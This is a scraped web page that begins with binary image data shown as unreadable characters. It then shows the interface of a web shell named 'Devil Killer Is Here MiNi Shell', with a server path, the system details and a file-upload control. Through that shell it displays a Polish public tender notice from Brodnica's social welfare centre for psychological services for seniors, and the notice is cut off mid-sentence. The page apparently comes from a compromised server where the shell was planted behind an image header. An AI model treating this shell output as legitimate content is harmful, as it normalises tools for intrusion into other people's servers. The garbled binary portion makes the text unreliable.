JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240222/0021577001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług psychologicznych dla podopiecznych Dziennego Domu Pobytu „Senior+” w ramach projektu „Brodnickie Centrum Usług Społecznych – realizacja usług społecznych dla mieszkańców Gminy (...)&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W BRODNICY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 382558849</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ustronie 2B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brodnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">564982742</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">564984933 wew. 223</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mops.brodnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mops.brodnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług psychologicznych dla podopiecznych Dziennego Domu Pobytu „Senior+” w ramach projektu „Brodnickie Centrum Usług Społecznych – realizacja usług społecznych dla mieszkańców Gminy (...)&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0af7375c-d1ba-11ee-a3b5-e25d731b0da9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00215770</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00028479/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Świadczenie usług psychologicznych dla podopiecznych Dziennego Domu Pobytu „Senior+”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie dla Kujaw i Pomorza 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0af7375c-d1ba-11ee-a3b5-e25d731b0da9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia): <br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0af7375c-d1ba-11ee-a3b5-e25d731b0da9 <br/>Zgodnie z art. 61 ust.1 PZP, komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/>Środkiem komunikacji elektronicznej, w niniejszym postępowaniu, jest „Platforma e-Zamówienia”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje i wymagania techniczne i organizacyjne na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl (link bezpośredni do treści Regulaminu - https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu) oraz informacje zamieszczone w zakładce „Centrum Pomocy” oraz „FAQ”, dostępne pod adresem https://ezamowienia.gov.pl/pl/komponent-edukacyjny/ oraz https://ezamowienia.gov.pl/soz/faqs .<br/>Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>W przedmiotowym postępowaniu ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 PZP, składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Rodzaj dostępnych formularzy umożliwiających elektroniczną komunikację zależy od posiadanego na Platformie konta.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia, który stanowi m.in. że w celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest: <br/>1)	Komputer PC o minimalnych parametrach: <br/>a)	Intel Core2 Duo, 2 GB RAM, HDD; <br/>b)	zainstalowany jeden z poniższych systemów operacyjnych: MS Windows 7 lub nowszy lub OSX/Mac OS 10.10 lub Ubuntu 14.04;<br/>c)	zainstalowana jedna z poniższych przeglądarek: Chrome 66.0 lub nowsza lub Firefox 59.0 lub nowszy lub Safari 11.1 lub nowsza lub Edge 14.0 i nowsze<br/>albo<br/>2)	Tablet/Telefon o minimalnych parametrach: <br/>a)	4 rdzenie procesora, <br/>b)	2GB RAM, <br/>c)	Android 6.0 Marshmallow, iOS 10.3, <br/>d)	Przeglądarka Chrome 61 lub nowsza.<br/>3)	Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu bezpiecznej transmisji danych SSL, obsługi Java Script, oraz cookies;<br/>4)	Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych:<br/>a)	specyfikacja połączenia – formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>b)	format danych oraz kodowanie: formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>c)	oznaczenia czasu odbioru danych: wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do sekundy,<br/>5)	posiadanie ważnego (aktualnie obowiązującego): kwalifikowanego podpisu elektronicznego do podpisywania plików w formie elektronicznej lub podpisu zaufanego lub podpisu osobistego do podpisywania plików w postaci elektronicznej.<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>Pani Magdalena Piotrowska, e-mail: zamowienia@mops.brodnica.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 oraz art. 14 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwane dalej „RODO” informuje się, że:<br/>1)	administratorem danych osobowych jest Dyrektor Miejskiego Ośrodka Pomocy Społecznej w Brodnicy (dane kontaktowe Miejski Ośrodek Pomocy Społecznej w Brodnicy, ul. Ustronie 2 B, 87-300 Brodnica, woj. Kujawsko-Pomorskie).<br/>2)	Wyznaczono inspektora ochrony danych, z którym można się kontaktować pisemnie na adres: Miejski Ośrodek Pomocy Społecznej w Brodnicy, ul. Ustronie 2 B, 87-300 Brodnica, woj. Kujawsko-Pomorskie lub telefonicznie 564983349 lub drogą elektroniczną iod@mops.brodnica.pl<br/>3)	Pani / Pana dane będą przetwarzane w oparciu o art. 6 ust. 1 lit. c RODO (Dz.Urz.UE.L.2016.119 z 04 maja 2016 r. ze zm.) w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/>4)	Odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (art. 18, art. 74), jak również inne podmioty upoważnione do odbioru danych osobowych na podstawie przepisów prawa lub zawartych z Administratorem umów, w tym podmioty zajmujące się obsługą informatyczną Administratora.<br/>5)	Dane po zrealizowaniu celu, dla którego zostały zebrane, będą przetwarzane do celów archiwalnych i przechowywane przez okres niezbędny do zrealizowania przepisów dotyczących archiwizowania danych obowiązujących u Administratora lub okresu trwałości projektu w przypadku otrzymania dofinansowania ze środków zewnętrznych.<br/>6)	Zamawiający informuje, że będzie przetwarzał dane osobowe w zakresie wskazanym w otrzymanej ofercie, dokumentach składanych przez wykonawcę oraz w publicznie dostępnych rejestrach i bazach danych np. CEIDG, KRS (art. 14 ust. 1 lit. d, art. 14 ust. 2 lit. f).<br/>7)	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO, prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b)	na podstawie art. 16 RODO, prawo do sprostowania Pani/Pana danych osobowych, które są nieprawidłowe oraz prawo do uzupełnienia Pani/Pana danych osobowych, które są niekompletne. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu postępowania oraz jego załączników,<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (na adres Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. <br/>8)	Obowiązek podania przez Panią / Pana danych osobowych Zamawiającemu jest wymogiem związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>9)	Dane osobowe nie będą przetwarzane w sposób opierający się na zautomatyzowanym przetwarzaniu. Decyzje nie będą podejmowane w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani / Panu:<br/>a)	prawo do przenoszenia danych osobowych,<br/>b)	prawo do wycofania zgody na przetwarzanie danych osobowych,<br/>c)	prawo do wniesienia sprzeciwu wobec przetwarzania danych,<br/>d)	prawo do usunięcia danych osobowych, przed okresem o którym mowa w Rozdziale I ust. 10 pkt 5 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOPS.271.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług psychologicznych dla 30 osób dorosłych, korzystających z usług Dziennego Domu Pobytu „Senior+” (dalej zwany „DDP”) w ramach projektu pn. „Brodnickie Centrum Usług Społecznych – realizacja usług społecznych dla mieszkańców Gminy Miasta Brodnicy”.<br/>2.	Usługi będą świadczone dla podopiecznych DDP w wymiarze po 20 godzin miesięcznie przez okres trwania projektu, z zastrzeżeniem m.in. zapisów niniejszej SWZ dotyczących wznowień i opcji. <br/>3.	Zamawiający informuje, że w pierwszym okresie realizacji umowy zawartej z Wykonawcą, dopuszcza zwiększenie miesięcznej liczby godzin ponad wskazany w ust. 2 wymiar 20 h, w celu wykonania całego limitu godzin wskazanego w realizowanym przez Zamawiającego projekcie. Zwiększony miesięczny wymiar nie przekroczy 40 godzin miesięcznie.<br/>4.	Przez godzinę świadczenia usługi, każdorazowo należy rozumieć pełną godzinę zegarową, tj. 60 minut.<br/>5.	W uzasadnionych przypadkach, w porozumieniu z Wykonawcą, Zamawiający może zmniejszyć ilość zleconych godzin w danym miesiącu z jednoczesnym zwiększeniem ilości zleconych godzin w kolejnym/kolejnych miesiącach, w zależności od potrzeb Zamawiającego.<br/>6.	W ramach zamówienia podstawowego, planuje się zlecić Wykonawcy realizację maksymalnie 720 godzin usług przez cały okres realizacji umowy zawartej w wyniku rozstrzygnięcia niniejszego postępowania, z zastrzeżeniem prawa do zmniejszenia liczby godzin do gwarantowanej ilości 300 godzin w ramach prawa opcji o której mowa w ust. 32-34 rozdziału III SWZ.<br/>7.	Świadczenie usług będzie się odbywało, w formie stacjonarnej w obiekcie Dziennego Domu Pobytu „Senior+”, pod adresem ul. Tatrzańska 8, 87-300 Brodnica, w godzinach jego pracy, tj. od poniedziałku do piątku w godzinach od 07.00 do 15.00, za wyjątkiem dni ustawowo wolnych od pracy oraz innych uprzednio zgłoszonych przez Zamawiającego przerw w realizowanych usługach.<br/>8. Usługa obejmuje realizację zamówienia polegającą w szczególności na: <br/>1)	doradztwie psychologicznym grupowym i indywidualnym,<br/>2)	udzielanie wsparcia i pomocy psychologicznej, w ramach prowadzonych indywidualnych i grupowych konsultacji,<br/>3)	zapewnieniu profesjonalnej pomocy psychologicznej, zwłaszcza w sytuacjach kryzysowych i wymagających fachowej pomocy,<br/>4)	świadczenie poradnictwa psychologicznego, według zgłaszanych bieżących potrzeb Zamawiającego,<br/>5)	sporządzanie diagnoz i opinii psychologicznych dla podopiecznych DDP. Sporządzanie diagnoz i opinii nie podlega dodatkowemu wynagrodzeniu, a czas przeznaczony na ich sporządzenie należy uwzględnić w czasie pracy na rzecz Zamawiającego,<br/>6)	prowadzeniu dokumentacji osób objętych wsparciem. Zamawiający dopuszcza prowadzenie dokumentacji na formularzach opracowanych przez Wykonawcę i zaakceptowanych przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający dopuszcza, w trakcie realizacji umowy zawartej z Wykonawcą na realizację przedmiotowego zamówienia, skorzystanie z prawa opcji, o którym mowa w art. 441 PZP, polegającego na: <br/>1)	zmianie liczby podopiecznych objętych projektem,<br/>2)	zmniejszeniu ilości godzin świadczonych usług psychologicznych w ramach zamówienia podstawowego z planowanych 720 godzin do gwarantowanej ilości 300 godzin przez cały okres realizacji umowy zawartej w wyniku rozstrzygnięcia niniejszego postępowania. Opcja zmniejszająca zostanie uruchomiona, jeśli cena jednostkowa brutto za godzinę świadczenia usługi wskazana w formularzu ofertowym Wykonawcy przekroczy cenę jednostkową, jaką Zamawiający planował przeznaczyć na realizację niniejszego zamówienia,<br/>3)	zwiększeniu ilości godzin ponad planowany maksymalny limit 720 godzin, o którym mowa w ust. 6 powyżej, w celu świadczeniu dodatkowych usług psychologicznych w formie doradztwa grupowego i indywidualnego w obiektach Zamawiającego mieszczących się pod adresami:<br/>a)	ul. Ustronie 2b, 87-300 Brodnica,<br/>b)	ul. św. Jakuba 22, 87-300 Brodnica,<br/>c)	ul. Gen. Władysława Sikorskiego 62/1, 87-300 Brodnica,<br/>d)	ul. Tatrzańska 8, 87-300 Brodnica<br/>- w celu realizacji zadań statutowych Zamawiającego lub zleconych z zakresu działalności Zamawiającego. W przypadku skorzystania z tego prawa, Wykonawca będzie realizował usługi psychologiczne maksymalnie do kwoty 20.000,00 zł brutto.<br/><br/>Opcja zwiększająca, o której mowa w ust. 32 pkt 3 powyżej, może zostać zlecona Wykonawcy do realizacji zarówno w trakcie wykonywania zamówienia podstawowego, opisanego w Rozdziale III w ustępach 1-28, jak również w okresie wznowienia, o którym mowa w ust. 30-31 powyżej.<br/>Realizacja opcji, jeśli Zamawiający z niej skorzysta, będzie realizowana przez Wykonawcę zgodnie z wymaganiami i zasadami jakościowymi opisanymi w SWZ i warunkach cenowych takich samych jak dla zamówienia podstawowego lub zamówienia rozszerzonego w ramach wznowienia, z zastrzeżeniem że Zamawiający każdorazowo będzie zgłaszał Wykonawcy ilość godzin, miejsce i termin realizacji usług psychologicznych, kategorię odbiorców usług, rodzaj porady – grupowa czy indywidualna.<br/>Wykonawcy nie przysługuje roszczenie o uruchomienie opcji ani jej kontynuację.<br/>W ramach opcji Zamawiający dopuszcza m.in. zwiększenie lub zmniejszenie ilości godzin świadczonych usług o bieżące potrzeby do wysokości limitów posiadanych środków finansowych na dany rok budżetowy i warunków realizowanego projektu. Maksymalny termin realizacji opcji będzie tożsamy z okresem realizacji projektu.<br/>Maksymalną wartość opcji zwiększającej, tj. ponad limit 720 godzin, ustala się na poziomie nieprzekraczającym 20.000,00 złotych brutto.<br/>Zamawiający może z opisanego w SWZ prawa opcji skorzystać w całości lub w części. Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamawiający zastrzega również, że ceny jednostkowe objęte opcją będą identyczne, jak w zamówieniu podstawowym.<br/> Skorzystanie z opcji będzie uzależnione od decyzji Zamawiającego, w tym m.in. od: warunków projektu, bieżących potrzeb, sytuacji rynkowej oraz posiadanych środków finansowych Zamawiającego.<br/>W przypadku skorzystania z prawa opcji, realizacja usług stanowiących przedmiot niniejszego postępowania będzie się odbywała zgodnie z warunkami i zasadami jakościowymi opisanymi w niniejszej SWZ i po takiej samej cenie jednostkowej jak realizacja zamówienia podstawowego lub rozszerzonego w ramach dokonanych wznowień, wskazanej w umowie zawartej w wyniku rozstrzygnięcia niniejszego postępowania z wyłonionym Wykonawcą.<br/>Cena jednostkowa brutto w ramach opcji będzie tożsama z ceną zamówienia podstawowego lub rozszerzonego w ramach dokonanych wznowień wskazaną w umowie. Cena jest ceną wyrażoną w PLN, gdyż Zamawiający dopuszcza rozliczenia wyłącznie w PLN<br/>Szczegółowy opis opcji zawarto w rozdziale III SWZ. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający dopuszcza skorzystanie z prawa do wznowienia, o którym mowa w art. 31 ust. 2 PZP, polegającego na przedłużeniu terminu realizacji zamówienia podstawowego, opisanego w Rozdziale III SWZ, po zakończeniu realizacji umowy zawartej w wyniku rozstrzygnięcia niniejszego postępowania. Realizacja zamówienia rozszerzonego w postaci wznowienia będzie się odbywała, przez cały okres wznowienia 